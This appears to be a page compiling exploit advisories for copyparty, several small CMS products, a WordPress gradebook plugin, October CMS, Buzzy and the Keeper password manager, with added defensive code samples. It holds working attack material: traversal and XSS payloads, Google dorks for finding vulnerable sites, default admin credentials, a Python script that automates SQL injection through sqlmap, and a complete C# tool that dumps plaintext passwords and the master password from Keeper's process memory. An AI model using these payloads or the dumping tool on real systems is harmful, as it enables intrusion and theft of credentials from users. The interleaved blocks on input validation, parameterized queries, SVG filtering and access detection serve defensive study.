<pre><code># Exploit Title: copyparty 1.8.2 - Directory Traversal
# Date: 14/07/2023
# Exploit Author: Vartamtzidis Theodoros (@TheHackyDog)
# Vendor Homepage: https://github.com/9001/copyparty/
# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.2
# Version: <=1.8.2
# Tested on: Debian Linux
# CVE : CVE-2023-37474

#Description
Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory.

#POC
curl -i -s -k -X GET 'http://127.0.0.1:3923/.cpr/%2Fetc%2Fpasswd'
</code></pre>
<pre><code># Exploit Title: copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)
# Date: 23/07/2023
# Exploit Author: Vartamtezidis Theodoros (@TheHackyDog)
# Vendor Homepage: https://github.com/9001/copyparty/
# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.6
# Version: <=1.8.6
# Tested on: Debian Linux
# CVE : CVE-2023-38501

#Description
Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) attack.

A vulnerability in the web interface of the application could allow an attacker to execute malicious JavaScript code by tricking users into accessing a malicious link.

#POC
https://localhost:3923/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(1)%3E
</code></pre>
<pre><code>====================================================================================================================================
| # Title : CMSninesol v1.0 XSS Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |
| # Vendor : https://www.ninesol.com |
| # Dork : |
====================================================================================================================================

poc :

[+] Dorking in Google or other search engine.

[+] use payload : /download.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3E

[+] http://127.0.0.1/comwaveedupk/download.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3E

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================
</code></pre>
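The copyparty `k304` bug above and the CMSninesol `download.php?id=` bug share one root cause: a request parameter is written back into the response without validation, and in the copyparty case it reaches a response header first, so the `%0D%0A` pair terminates the header block and the rest is rendered as HTML. The following handler is an added example of the server-side fix and is my code, not copyparty's or CMSninesol's; the handler shape, cookie name and page markup are assumptions. It allowlists the `k304` value before any header is built, refuses control characters in any header value, and HTML-escapes everything it reflects, including an arbitrary `id` string.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# The setting is a yes/no switch, so an allowlist is the whole validation.
K304_ALLOWED = {"y", "n"}
# ASCII control characters, CR and LF included, must never reach a header line.
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def parse_k304(query_string):
    """Return the validated k304 value, or None if it is missing, repeated or not allowlisted.

    parse_qs percent-decodes, so the %0D%0A and %3Cimg... of the advisory's URL arrive
    here as literal CR, LF and '<' and fail the allowlist before any header is written.
    """
    values = parse_qs(query_string, keep_blank_values=True).get("k304", [])
    if len(values) != 1:
        return None
    return values[0] if values[0] in K304_ALLOWED else None


def header_value_ok(value):
    """A header field value may not contain any control character."""
    return CONTROL_CHARS.search(value) is None


def set_cookie_header(name, value):
    """Build one Set-Cookie line, refusing any value that could split the response."""
    if not header_value_ok(name) or not header_value_ok(value):
        raise ValueError("control character in header field")
    return f"Set-Cookie: {name}={value}; Path=/; HttpOnly; SameSite=Lax"


def reflect(label, value):
    """Reflect a request value into HTML as text, never as markup (covers the id= case too)."""
    return f"<p>{html.escape(label)}: {html.escape(value, quote=True)}</p>"


def handle(url):
    """Minimal request handler: returns (status, header lines, body) for a GET of url."""
    value = parse_k304(urlsplit(url).query)
    if value is None:
        return 400, [], "<p>k304 must be y or n</p>"
    return 200, [set_cookie_header("k304", value)], reflect("k304 is now", value)


if __name__ == "__main__":
    print(handle("https://localhost:3923/?k304=y"))
    print(handle("https://localhost:3923/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(1)%3E"))
    print(reflect("id", "<script>alert(/indoushka/);</script>"))
```

The allowlist does the heavy lifting for `k304`; `header_value_ok` is the backstop for any header whose value cannot be enumerated, and `reflect` is the rule for every reflected string regardless of where it came from.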
<pre><code>====================================================================================================================================
| # Title : CMSdosma v5.0 Unauthorized Administrative Access Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 73.0.1(32-bit) |
| # Vendor : http://dosmacommunications.co.za/home/ |
| # Dork : intext:www.feliciabuthelezi.co.za. All rights Reserved |
====================================================================================================================================

poc :

[+] Dorking in Google or other search engine.

[+] Allows full control of the website

[+] Use payload : /admin/addreview.php?p=insertreview

[+] http://127.0.0.1/feliciabuthelezicoza/admin/addreview.php?p=insertreview

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================
</code></pre>
<pre><code>#!/usr/bin/python3

# Exploit Title: WordPress Plugin AN_Gradebook <= 5.0.1 - Subscriber+ SQLi
# Date: 2023-07-26
# Exploit Author: Lukas Kinneberg
# Github: https://github.com/lukinneberg/CVE-2023-2636
# Vendor Homepage: https://wordpress.org/plugins/an-gradebook/
# Software Link: https://github.com/lukinneberg/CVE-2023-2636/blob/main/an-gradebook.7z
# Tested on: WordPress 6.2.2
# CVE: CVE-2023-2636


from datetime import datetime
import os
import requests
import json

# User Input:
target_ip = 'CHANGE_THIS'
target_port = '80'
username = 'hacker'
password = 'hacker'

banner = '''

 ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ 
||C |||V |||E |||- |||2 |||0 |||2 |||3 |||- |||2 |||6 |||3 |||6 ||
||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|
 Exploit Author: Lukas Kinneberg

'''

print(banner)

print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))

# Authentication:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + '/wp-login.php'
check = session.get(auth_url)
# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)

# SQL-Injection (Exploit):
# Generate payload for sqlmap
cookies_session = session.cookies.get_dict()
cookie = json.dumps(cookies_session)
cookie = cookie.replace('"}','')
cookie = cookie.replace('{"', '')
cookie = cookie.replace('"', '')
cookie = cookie.replace(" ", '')
cookie = cookie.replace(":", '=')
cookie = cookie.replace(',', '; ')

print('[*] Payload for SQL-Injection:')

# Enter the URL path of the course after the target_port below
exploitcode_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + r'/wp-admin/admin-ajax.php?action=course&id=3" '
exploitcode_risk = '--level 2 --risk 2 '
exploitcode_cookie = '--cookie="' + cookie + '" '


# SQLMAP Printout
print(' Sqlmap options:')
print(' -a, --all Retrieve everything')
print(' -b, --banner Retrieve DBMS banner')
print(' --current-user Retrieve DBMS current user')
print(' --current-db Retrieve DBMS current database')
print(' --passwords Enumerate DBMS users password hashes')
print(' --tables Enumerate DBMS database tables')
print(' --columns Enumerate DBMS database table column')
print(' --schema Enumerate DBMS schema')
print(' --dump Dump DBMS database table entries')
print(' --dump-all Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + retrieve_mode + ' -p id -v 0 --answers="follow=Y" --batch'
os.system(exploitcode)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
</code></pre>
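The injectable point in the advisory is the `id` parameter of the `action=course` AJAX handler, reachable by any logged-in subscriber. As an added example that is not part of the advisory or of the plugin, the block below puts the concatenation pattern next to its fix: coerce the parameter to the type the column actually has, bind it, and then still apply an authorization filter, because a parameterized query only stops injection, not a subscriber reading another user's course. The schema and rows are constructed for the demo and sqlite3 stands in for MySQL; neither is the plugin's real schema.

```python
import sqlite3


def make_db():
    """Constructed stand-in for a course table: id, name and the owning user id."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE courses (id INTEGER PRIMARY KEY, name TEXT, owner INTEGER)")
    conn.executemany(
        "INSERT INTO courses VALUES (?, ?, ?)",
        [(1, "Algebra", 10), (2, "Biology", 11), (3, "Chemistry", 12)],
    )
    return conn


def course_vulnerable(conn, course_id):
    """The pattern behind the advisory: the request parameter is spliced into the SQL text,
    so a value such as '3 OR 1=1' changes the WHERE clause instead of selecting one row."""
    sql = "SELECT id, name FROM courses WHERE id = " + course_id
    return conn.execute(sql).fetchall()


def course_safe(conn, course_id):
    """Coerce to the column's type first, then bind: the driver sends a value, never SQL."""
    try:
        cid = int(course_id)
    except (TypeError, ValueError):
        return []
    return conn.execute("SELECT id, name FROM courses WHERE id = ?", (cid,)).fetchall()


def course_for_user(conn, course_id, current_user):
    """Same binding plus the authorization predicate; a subscriber only sees their own course."""
    try:
        cid = int(course_id)
    except (TypeError, ValueError):
        return []
    return conn.execute(
        "SELECT id, name FROM courses WHERE id = ? AND owner = ?", (cid, current_user)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, id=3        :", course_vulnerable(db, "3"))
    print("vulnerable, id=3 OR 1=1 :", course_vulnerable(db, "3 OR 1=1"))
    print("safe, id=3 OR 1=1       :", course_safe(db, "3 OR 1=1"))
    print("owner check, user 10    :", course_for_user(db, "3", 10))
```

In WordPress the equivalent of the bound query is `$wpdb->prepare()` with a `%d` placeholder for the id, followed by a capability or ownership check before the row is returned.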
<pre><code>====================================================================================================================================
| # Title : CMSJerusalem Weather Forecast v1.3 Directory Traversal Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(64-bit) |
| # Vendor : https://www.behance.net/user/?username=galizorea |
| # Dork : Designed by Gali Zorea |
====================================================================================================================================

poc :

[+] Dorking in Google or other search engine.

[+] Use payload : /small.php?section=../../../../../../../../../etc/passwd

[+] http://target_site/small.php?section=../../../../../../../../../etc/passwd

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================
</code></pre>
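The copyparty `.cpr` advisory earlier on this page and the CMSJerusalem `section=` advisory above are two shapes of the same defect: a decoded request path is joined onto a directory root, and either an encoded absolute path (`%2Fetc%2Fpasswd`) replaces the root outright or a run of `../` climbs above it. The block below is an added example and is my code, not either project's; it shows the unsafe join, a containment check that handles both shapes (decode before any path logic, force the path relative, refuse leading `..`, confirm the common prefix), and a screen for access-log lines that carry the same signs. The log lines are constructed and modelled on the two payloads; the regular expressions are mine.

```python
import posixpath
import re
from urllib.parse import unquote


def decode_path(raw):
    """Percent-decode up to twice, so %2F and a double-encoded %252F both become '/'."""
    once = unquote(raw)
    return unquote(once) if "%" in once else once


def join_vulnerable(root, decoded):
    """The pattern behind both advisories.  posixpath.join discards root when decoded is
    absolute, and normpath lets a run of '..' climb above it, so both payloads resolve
    to /etc/passwd."""
    return posixpath.normpath(posixpath.join(root, decoded))


def resolve_under_root(root, raw_path):
    """Map a request path to a filesystem path under root, or None if it cannot be contained."""
    root = posixpath.normpath(root)
    decoded = decode_path(raw_path)
    if "\x00" in decoded or "\\" in decoded:          # NUL truncation, Windows separators
        return None
    rel = posixpath.normpath(decoded.lstrip("/"))     # never let the request be absolute
    if rel == ".." or rel.startswith("../"):          # normpath left a climb above root
        return None
    full = posixpath.normpath(posixpath.join(root, rel))
    if posixpath.commonpath([root, full]) != root:    # belt and braces on the final path
        return None
    return full


# '..' as a whole path or query segment: preceded by start, '/', '=', '&' or '?'
# and followed by end, '/', '&' or '?'.  'report..pdf' does not match.
DOT_DOT_SEGMENT = re.compile(r"(?<![^/=&?])\.\.(?![^/&?])")
# Encoded '/', '\' or '%' in the raw request target: browsers do not send these for a path.
ENCODED_SEPARATOR = re.compile(r"%(2f|5c|25)", re.IGNORECASE)
REQUEST_TARGET = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def flag_traversal_requests(log_lines):
    """Return the request targets in Combined-Log-Format lines that show traversal signs."""
    flagged = []
    for line in log_lines:
        m = REQUEST_TARGET.search(line)
        if not m:
            continue
        target = m.group(1)
        if ENCODED_SEPARATOR.search(target) or DOT_DOT_SEGMENT.search(decode_path(target)):
            flagged.append(target)
    return flagged


# Constructed access-log lines: the two advisory payloads plus two benign requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Jul/2023:10:00:01 +0000] "GET /.cpr/%2Fetc%2Fpasswd HTTP/1.1" 200 1234',
    '10.0.0.6 - - [14/Jul/2023:10:00:02 +0000] "GET /small.php?section=../../../../../../../../../etc/passwd HTTP/1.1" 200 981',
    '10.0.0.7 - - [14/Jul/2023:10:00:03 +0000] "GET /.cpr/deps/ui.css HTTP/1.1" 200 4410',
    '10.0.0.8 - - [14/Jul/2023:10:00:04 +0000] "GET /docs/report..pdf HTTP/1.1" 200 20',
]


if __name__ == "__main__":
    print("unsafe join  :", join_vulnerable("/srv/www/.cpr", decode_path("%2Fetc%2Fpasswd")))
    print("contained    :", resolve_under_root("/srv/www", ".cpr/%2Fetc%2Fpasswd"))
    print("rejected     :", resolve_under_root("/srv/www", "../../../../../../../../../etc/passwd"))
    print("flagged lines:", flag_traversal_requests(SAMPLE_LOG))
```

`resolve_under_root` deliberately maps `%2Fetc%2Fpasswd` to a file under the root rather than rejecting it, which is the behaviour a static-file handler wants; the log screen, by contrast, flags the raw encoded separator because a legitimate client has no reason to send one.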
<pre><code>#Exploit Title: October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated)
#Date: 29 June 2023
#Exploit Author: Okan Kurtulus
#Vendor Homepage: https://octobercms.com
#Version: v3.4.4
#Tested on: Ubuntu 22.04
#CVE : N/A

# Proof of Concept:
1– Install the system through the website and log in as any user with file-upload rights.
2– Select "Media" in the top menu. Prepare an SVG file using the payload below.
3– Upload the SVG file and open it from the directory it was stored in. The XSS will be triggered.

#Stored XSS Payload:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
 <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
 <script type="text/javascript">
 alert(1);
 </script>
</svg>
</code></pre>
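An SVG is an XML document, so the upload filter that matters is one that parses it and looks for active content (`<script>`, `<foreignObject>`, `on*` event attributes, `javascript:` URLs) rather than grepping for a string, and the serving side should still assume a file slipped through. The block below is an added example and is my code, not October CMS's; the check function, the header set and the filename handling are assumptions. The first sample is the advisory's payload; the other two SVGs are constructed.

```python
import re
import xml.etree.ElementTree as ET

# Elements that carry or embed executable content when the SVG is rendered as a document.
ACTIVE_ELEMENTS = {"script", "foreignobject"}


def svg_active_content(data):
    """Return the reasons an uploaded SVG must not be served inline (empty list: none found).
    A real XML parser is used so namespaces, case and whitespace tricks do not matter."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    reasons = []
    for elem in root.iter():
        local = elem.tag.split("}")[-1].lower()       # strip the {namespace} prefix
        if local in ACTIVE_ELEMENTS:
            reasons.append(f"<{local}> element")
        for name, value in elem.attrib.items():
            attr = name.split("}")[-1].lower()
            if attr.startswith("on"):
                reasons.append(f"{attr} handler on <{local}>")
            elif attr == "href" and value.strip().lower().startswith("javascript:"):
                reasons.append(f"javascript: URL on <{local}>")
    return reasons


def response_headers_for_upload(filename, data):
    """Headers for serving a user upload, or None if the file is refused.  Uploads are sent
    as downloads with sniffing disabled and a script-less CSP, so even a file that passed
    the check cannot run in the site's origin when opened directly."""
    safe_name = re.sub(r"[^\w.-]", "_", filename)
    is_svg = safe_name.lower().endswith(".svg")
    if is_svg and svg_active_content(data):
        return None
    return {
        "Content-Type": "image/svg+xml" if is_svg else "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
    }


# The advisory's payload, as bytes.
PAYLOAD_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
 <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
 <script type="text/javascript">
 alert(1);
 </script>
</svg>"""

# Constructed: the same drawing with no active content.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" version="1.1">
 <polygon points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
</svg>"""

# Constructed: no <script> element, but an event handler attribute on the root.
HANDLER_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">
 <rect width="10" height="10"/>
</svg>"""


if __name__ == "__main__":
    for name, doc in [("payload", PAYLOAD_SVG), ("benign", BENIGN_SVG), ("handler", HANDLER_SVG)]:
        print(name, svg_active_content(doc))
    print(response_headers_for_upload("triangle.svg", BENIGN_SVG))
```

Rejecting at upload time and serving with `Content-Disposition: attachment` plus a restrictive CSP are independent controls; the second one is what keeps an SVG that was uploaded before the filter existed from executing in the application's origin.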
<pre><code>====================================================================================================================================
| # Title : Yourdoctor CMS v1.4 Unauthorised Administrative Access Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |
| # Vendor : https://codecanyon.net/item/yourdoctor-medical-and-doctor-website-cms/20811493 |
| # Dork : "Lorem ipsum dolor sit amet, omnis signiferumque in mei, mei ex." |
====================================================================================================================================

poc :

[+] Dorking in Google or other search engine.

[+] Unauthorized administrator access. Allows any visitor to download the subscriber list.

[+] use payload : /admin/subscriber-csv.php

[+] http://127.0.0.1/admin/subscriber-csv.php

Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================
</code></pre>
<pre><code># Exploit Title: Keeper Security desktop 16.10.2 & Browser Extension 16.5.4 - Password Dumping
# Google Dork: NA
# Date: 22-07-2023
# Exploit Author: H4rk3nz0
# Vendor Homepage: https://www.keepersecurity.com/en_GB/
# Software Link: https://www.keepersecurity.com/en_GB/get-keeper.html
# Version: Desktop App version 16.10.2 & Browser Extension version 16.5.4
# Tested on: Windows
# CVE : CVE-2023-36266

using System;
using System.Management;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Text.RegularExpressions;
using System.Collections.Generic;

// Keeper Security Password vault Desktop application and Browser Extension stores credentials in plain text in memory
// This can persist after logout if the user has not explicitly enabled the option to 'clear process memory'
// As a result of this one can extract credentials & master password from a victim after achieving low priv access
// This does NOT target or extract credentials from the affected browser extension (yet), only the Windows desktop app.
// Github: https://github.com/H4rk3nz0/Peeper

static class Program
{
    // To make sure we are targeting the right child process - check command line
    public static string GetCommandLine(this Process process)
    {
        if (process is null || process.Id < 1)
        {
            return "";
        }
        string query = $@"SELECT CommandLine FROM Win32_Process WHERE ProcessId = {process.Id}";
        using (var searcher = new ManagementObjectSearcher(query))
        using (var collection = searcher.Get())
        {
            var managementObject = collection.OfType<ManagementObject>().FirstOrDefault();
            return managementObject != null ? (string)managementObject["CommandLine"] : "";
        }
    }

    //Extract plain text credential JSON strings (regex inelegant but fast)
    public static void extract_credentials(string text)
    {
        int index = text.IndexOf("{\"title\":\"");
        int eindex = text.IndexOf("}");
        while (index >= 0)
        {
            try
            {
                int endIndex = Math.Min(index + eindex, text.Length);
                Regex reg = new Regex("(\\{\\\"title\\\"[ -~]+\\}(?=\\s))");
                string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();

                int match_cut = match.IndexOf("} ");
                if (match_cut != -1 )
                {
                    match = match.Substring(0, match_cut + "} ".Length).TrimEnd();
                    if (!stringsList.Contains(match) && match.Length > 20)
                    {
                        Console.WriteLine("->Credential Record Found : " + match.Substring(0, match_cut + "} ".Length) + "\n");
                        stringsList.Add(match);
                    }

                } else if (!stringsList.Contains(match.TrimEnd()) && match.Length > 20)
                {
                    Console.WriteLine("->Credential Record Found : " + match + "\n");
                    stringsList.Add(match.TrimEnd());
                }
                index = text.IndexOf("{\"title\":\"", index + 1);
                eindex = text.IndexOf("}", eindex + 1);
            }
            catch
            {
                return;
            }

        }
    }

    // extract account/email containing JSON string
    public static void extract_account(string text)
    {
        int index = text.IndexOf("{\"expiry\"");
        int eindex = text.IndexOf("}");
        while (index >= 0)
        {
            try
            {
                int endIndex = Math.Min(index + eindex, text.Length);
                Regex reg = new Regex("(\\{\\\"expiry\\\"[ -~]+@[ -~]+(?=\\}).)");
                string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
                if ((match.Length > 2))
                {
                    Console.WriteLine("->Account Record Found : " + match + "\n");
                    return;
                }
                index = text.IndexOf("{\"expiry\"", index + 1);
                eindex = text.IndexOf("}", eindex + 1);
            }
            catch
            {
                return;
            }
        }

    }

    // Master password not available with SSO based logins but worth looking for.
    // Disregard other data key entries that seem to match: _not_master_key_example
    public static void extract_master(string text)
    {
        int index = text.IndexOf("data_key");
        int eindex = index + 64;
        while (index >= 0)
        {
            try
            {
                int endIndex = Math.Min(index + eindex, text.Length);
                Regex reg = new Regex("(data_key[ -~]+)");
                var match_one = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
                Regex clean = new Regex("(_[a-zA-z]{1,14}_[a-zA-Z]{1,10})");
                if (match_one.Replace("data_key", "").Length > 5)
                {
                    if (!clean.IsMatch(match_one.Replace("data_key", "")))
                    {
                        Console.WriteLine("->Master Password : " + match_one.Replace("data_key", "") + "\n");
                    }

                }
                index = text.IndexOf("data_key", index + 1);
                eindex = index + 64;
            }
            catch
            {
                return;
            }

        }
    }

    // Store extracted strings and compare
    public static List<string> stringsList = new List<string>();

    // Main function, iterates over private committed memory pages, reads memory and performs regex against the pages UTF-8
    // Performs OpenProcess to get handle with necessary query permissions
    static void Main(string[] args)
    {
        foreach (var process in Process.GetProcessesByName("keeperpasswordmanager"))
        {
            string commandline = GetCommandLine(process);
            if (commandline.Contains("--renderer-client-id=5") || commandline.Contains("--renderer-client-id=7"))
            {
                Console.WriteLine("->Keeper Target PID Found: {0}", process.Id.ToString());
                Console.WriteLine("->Searching...\n");
                IntPtr processHandle = OpenProcess(0x00000400 | 0x00000010, false, process.Id);
                IntPtr address = new IntPtr(0x10000000000);
                MEMORY_BASIC_INFORMATION memInfo = new MEMORY_BASIC_INFORMATION();
                while (VirtualQueryEx(processHandle, address, out memInfo, (uint)Marshal.SizeOf(memInfo)) != 0)
                {
                    if (memInfo.State == 0x00001000 && memInfo.Type == 0x20000)
                    {
                        byte[] buffer = new byte[(int)memInfo.RegionSize];
                        if (NtReadVirtualMemory(processHandle, memInfo.BaseAddress, buffer, (uint)memInfo.RegionSize, IntPtr.Zero) == 0x0)
                        {
                            string text = Encoding.ASCII.GetString(buffer);
                            extract_credentials(text);
                            extract_master(text);
                            extract_account(text);
                        }
                    }

                    address = new IntPtr(memInfo.BaseAddress.ToInt64() + memInfo.RegionSize.ToInt64());
                }

                CloseHandle(processHandle);

            }

        }

    }

    [DllImport("kernel32.dll")]
    public static extern IntPtr OpenProcess(uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, int dwProcessId);

    [DllImport("kernel32.dll")]
    public static extern bool CloseHandle(IntPtr hObject);

    [DllImport("ntdll.dll")]
    public static extern uint NtReadVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] Buffer, UInt32 NumberOfBytesToRead, IntPtr NumberOfBytesRead);

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern int VirtualQueryEx(IntPtr hProcess, IntPtr lpAddress, out MEMORY_BASIC_INFORMATION lpBuffer, uint dwLength);

    [StructLayout(LayoutKind.Sequential)]
    public struct MEMORY_BASIC_INFORMATION
    {
        public IntPtr BaseAddress;
        public IntPtr AllocationBase;
        public uint AllocationProtect;
        public IntPtr RegionSize;
        public uint State;
        public uint Protect;
        public uint Type;
    }
}
</code></pre>
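The tool above works by opening the Keeper renderer process with `PROCESS_QUERY_INFORMATION | PROCESS_VM_READ` (`0x400 | 0x10`) and reading its committed private pages. That handle open is exactly what endpoint telemetry such as Sysmon Event ID 10 (ProcessAccess) records, with `SourceImage`, `TargetImage` and a `GrantedAccess` mask, so the detection is a foreign image obtaining `PROCESS_VM_READ` on a process known to hold secrets. The block below is an added example of that rule and is my code, not the advisory's or Keeper's. The event lines are constructed in a simple `Key: value | Key: value` text form that borrows the Sysmon field names; the file paths and the set of sensitive targets are assumptions.

```python
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400

# Processes whose memory holds secrets; a foreign handle with read rights on them is notable.
SENSITIVE_TARGETS = {"keeperpasswordmanager.exe", "lsass.exe"}


def parse_event(line):
    """Parse one constructed 'Key: value | Key: value' line into a dict."""
    event = {}
    for field in line.split(" | "):
        key, _, value = field.partition(": ")
        event[key.strip()] = value.strip()
    return event


def basename(path):
    """Case-folded file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_suspicious_access(event):
    """True when a different image opened a sensitive process with PROCESS_VM_READ.
    An Electron parent opening its own renderer children carries the same target name,
    so a source equal to the target is treated as expected."""
    target = basename(event.get("TargetImage", ""))
    source = basename(event.get("SourceImage", ""))
    if target not in SENSITIVE_TARGETS or source == target:
        return False
    try:
        granted = int(event.get("GrantedAccess", "0"), 16)   # accepts '0x410'
    except ValueError:
        return False
    return bool(granted & PROCESS_VM_READ)


def scan(lines):
    """Return (source, target, granted-access) for every suspicious event."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if is_suspicious_access(ev):
            hits.append((ev["SourceImage"], ev["TargetImage"], ev["GrantedAccess"]))
    return hits


# Constructed events.  The first mirrors the advisory's OpenProcess mask (0x400 | 0x10);
# the second is the app opening its own renderer; the third is a query-only handle
# (no VM_READ bit); the fourth is VM_READ on a process that is not sensitive.
KEEPER = "C:\\Users\\bob\\AppData\\Local\\Programs\\Keeper\\keeperpasswordmanager.exe"
SAMPLE_EVENTS = [
    "EventID: 10 | SourceImage: C:\\Users\\bob\\Downloads\\peeper.exe | TargetImage: " + KEEPER + " | GrantedAccess: 0x410",
    "EventID: 10 | SourceImage: " + KEEPER + " | TargetImage: " + KEEPER + " | GrantedAccess: 0x1FFFFF",
    "EventID: 10 | SourceImage: C:\\Windows\\System32\\taskmgr.exe | TargetImage: " + KEEPER + " | GrantedAccess: 0x1400",
    "EventID: 10 | SourceImage: C:\\Windows\\System32\\svchost.exe | TargetImage: C:\\Windows\\explorer.exe | GrantedAccess: 0x1010",
]


if __name__ == "__main__":
    for source, target, granted in scan(SAMPLE_EVENTS):
        print(f"suspicious: {source} -> {target} ({granted})")
```

Checking the bit rather than the whole mask matters: `0x1FFFFF` (full access) and `0x410` both carry `PROCESS_VM_READ`, while `0x1400` does not, and a rule keyed on the exact value `0x410` would miss a tool that simply asked for more.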
<pre><code>======================================================================================================================================
| # Title : Buzzy - News Viral Lists Polls and Videos V 2.5.2 Insecure Settings Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) |
| # Vendor : https://codecanyon.net/item/buzzy-news-viral-lists-polls-and-videos/13300279?s_rank=4 |
| # Dork : "buzzy /profile/admin/ Copyright © Buzzy. All rights reserved." |
======================================================================================================================================

poc :

[+] Dorking in Google or other search engine.

[+] The application appears to leave its default credentials in place after installation.

[+] Use Admin : admin@admin.com & Pass : admin

[+] http://wwclickhungamacom/

Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================
</code></pre>